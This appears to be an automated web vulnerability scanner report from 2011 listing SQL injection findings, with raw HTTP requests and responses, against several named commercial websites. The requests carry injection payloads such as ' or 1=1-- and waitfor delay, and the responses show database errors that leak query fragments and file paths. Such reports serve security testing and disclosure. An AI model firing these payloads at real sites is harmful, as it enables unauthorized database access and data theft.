POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=uh9nm4eto5 Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Length: 43 txtEmail=19587081'%20or%201%3d1-- |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:59:13 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <title>Trust Guard Login</title> <script type="text/javascript"> //<![CDATA[ document.getElements //]]> function TemplateOnUnload() { } </script> </head> <body style="background-color: <div style="text-align: center"> <center> <table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0"> <tr> <td style="background-image </td> </tr> <tr> <td align="center" style="vertical-align: middle; height: 23px;"></td> </tr> <tr> <td> <br /> <center> <div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid; width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;"> <form id="content:content" method="post" style="margin:0px" action="index.php"> <br /><br /> <script type="text/javascript"> function validateForm() { var message; var nouser = (!validatePresent var nopass = (!validatePresent if (nouser && nopass) message = 'Please enter a username and a password.'; else if (nouser) message = 'Please enter a username.'; else if (nopass) message = 'Please enter a password.'; ...[SNIP]... |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=uh9nm4eto5 Accept-Encoding: gzip, deflate Connection: Keep-Alive Content-Length: 43 txtEmail=19587081'%20or%201%3d2-- |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:59:14 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3795 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <title>Reset Password</title> <script type="text/javascript"> //<![CDATA[ document.getElements //]]> function TemplateOnUnload() { } </script> </head> <body style="background-color: <div style="text-align: center"> <center> <table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0"> <tr> <td style="background-image </td> </tr> <tr> <td align="center" style="vertical-align: middle; height: 23px;"></td> </tr> <tr> <td> <br /> <center> <div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid; width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;"> <form method="post" style="margin:0px"> Enter you email address or site name below and click Submit and we will send you a new password<br /> <input id="txtEmail" name="txtEmail" type="text" value="19587081' or 1=2-- " style="width:300px" onblur="validatePresent <div id="msg_email"> < <span style="color:Red"> <span id='lblResult' >Could not find an account will the site 19587081' or 1=2-- .</span> </span> <br /> <input id='btnSubmit' name='btnSubmit' type="submit" value="Submit" onclick="return validatePresent(document ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 02:13:09 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5139 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:06:53 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php/1'waitfor%20delay'0%3a0 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:55:15 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://subscribe |
Path: | /scm/ |
GET /scm/?form='waitfor%20delay'0%3a0 Host: subscribe.haymarketmedia Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 21:49:49 GMT Content-Length: 5478 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><link href="Pubs/SC ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=-111%27%20OR Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:14:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 412 </td></tr></table><b ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=2546'&scs_tid=-1+OR+17-7%3d10 HTTP/1.1 Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_2546_1=68004 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:08:24 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 391 </td></tr></table><b <b>MySQL ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2546''' at line 1)<br> ...[SNIP]... |
GET /?scs_sid=2546''&scs_tid=-1+OR+17-7%3d10 HTTP/1.1 Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_2546_1=68004 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:08:24 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 102 <html><body><h1>An error has occurred.</h1><p>Please contact support for assistance.</p></body>< |
Severity: | High |
Confidence: | Tentative |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=2546&scs_tid= Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:36 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 102 <html><body><h1>An error has occurred.</h1><p>Please contact support for assistance.</p></body>< |
GET /?scs_sid=2546&scs_tid= Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:36 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 1022 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Tour Unavailable</title> <style type="text/css"> body{ margin:0; padding:0; } a{ color:#9E2626; } a:hover{ text-decoration:none; } .left { float:left; } #container { width:640px; margin:50px auto 20px auto; padding:0; } #container #content { margin-left: 200px; } </style> </head> <body> <div id="container"> <img class="left" src="images/alert_175x162 <div id="content"> <h1>Oops!</h1> <p>The tour you have requested does not exist or is not currently available. Please <a href="mailto:support </div> </div> </body> </html> |
Severity: | High |
Confidence: | Firm |
Host: | http://tours.sapha.com |
Path: | / |
GET /?scs_sid=2546&scs_tid Host: tours.sapha.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:06:38 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 429 </td></tr></table><b ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.brownrudnick |
Path: | /nr/alertsArchv.asp |
GET /nr/alertsArchv.asp?Year Cookie: ASPSESSIONIDSSSASTRS Host: www.brownrudnick.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 Accept: */* |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 06 May 2011 18:47:11 GMT X-Powered-By: ASP.NET MicrosoftOfficeWebServer: 5.0_Pub Content-Length: 13913 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQRDRRTT Cache-control: private <html> <head> <meta http-equiv="Content <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Brown Rudnick - Alerts and Newsletters - ...[SNIP]... </i> Microsoft OLE DB Provider for ODBC Drivers<br> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /accommodation2.php |
GET /accommodation2.php?id Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:51 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 10042 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL ...[SNIP]... </textarea> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james <html> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /accommodation2.php |
GET /accommodation2.php?id=/1'8289 HTTP/1.1 Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:44 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 10070 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'8289' at line 1<br /><br /><textarea rows="10" cols="10 ...[SNIP]... </textarea> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james <html> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /get-image.php |
GET /get-image.php?id=18696' HTTP/1.1 Referer: http://www.caribbean User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.caribbean-ocean.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 16:00:06 GMT Server: Apache/2.2.4 (Linux/SUSE) Content-Length: 934 Content-Type: image/jpg 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL ...[SNIP]... </textarea> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james Warning: fopen(../images/not-found ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /get-image.php |
GET /get-image.php?id=1/1'8696 HTTP/1.1 Referer: http://www.caribbean User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.caribbean-ocean.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 16:00:17 GMT Server: Apache/2.2.4 (Linux/SUSE) Content-Length: 940 Content-Type: image/jpg 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'8696' at line 1<br /><br /><textarea rows="10" cols="100" ...[SNIP]... </textarea> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james Warning: fopen(../images/not-found ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /luxury%20Barbados |
GET /luxury%20Barbados Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:57 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 6887 <html> <head> <title>Luxury and exclusive Caribbean holidays in luxury</title> <meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD ...[SNIP]... <br /> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br /> ...[SNIP]... </textarea> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james </div> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.caribbean |
Path: | /luxury%20Jamaica |
GET /luxury%20Jamaica Host: www.caribbean-ocean.com Proxy-Connection: keep-alive Referer: http://www.caribbean User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=lj6iq5k4nc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:25 GMT Server: Apache/2.2.4 (Linux/SUSE) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 6888 <html> <head> <title>Luxury and exclusive Caribbean holidays in luxury</title> <meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD ...[SNIP]... <br /> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br /> ...[SNIP]... </textarea> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james </div> ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Advertiser |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:23 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=bdf614ab37 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:23 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 32708 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Home</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Home"> <meta name="keywords" content="Home"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <script language="javascript" type="text/javascript"> var IsIPad = false; function QueryStringIsRequest Queries = window.location.search if (Queries == "" || Queries == null) { return false; } else { QueryArray = Queries.split("&"); for (i = 0; i < QueryArray.length; i++) { QueryValue = QueryArray[i].split("="); if (QueryValue[0] == DirectToFullSite) { if (QueryValue[1] == "fs24lmj09") return true; else return false; } else return false; } } } function IsMobileRedirection() { var agent = navigator.userAgent var IsMobile = false; if ((agent.indexOf('absinthe (agent.indexOf('albacore' ...[SNIP]... |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:37:23 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=e7b89d9d22 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:37:23 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html Set-Cookie: TSa27990=17226455681 |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Advertiser |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:57 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=dba9e76780 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:57 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=a6085532e06 Content-Length: 34603 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Advertising User Agreement</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Advertising User Agreement"> <meta name="keywords" content="Advertising User Agreement"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, ...[SNIP]... |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:35:57 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=6fbc3a6086 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:35:57 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Content-Length: 34603 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Advertising User Agreement</title> <base href="http://www <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="description" content="Advertising User Agreement"> <meta name="keywords" content="Advertising User Agreement"> <meta name="copyright" content="Dominion Enterprises"> <meta name="resource-type" content="document"> <meta name="distribution" content="global"> <meta name="author" content=""> <meta name="robots" content="index, follow"> <meta name="revisit-after" content="1 days"> <meta name="rating" content="general"> <link rel="stylesheet" href="http://www <link rel="stylesheet" href="http://www <!-- calendar stylesheet --> <link rel="stylesheet" type="text/css" media="all" href="http://www <!-- main calendar program --> <script type="text/javascript" src="http://www <!-- language for the calendar --> <script type="text/javascript" src="http://www <!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. --> <script type="text/javascript ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/Careers72254876'%20or%201%3d1-- Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
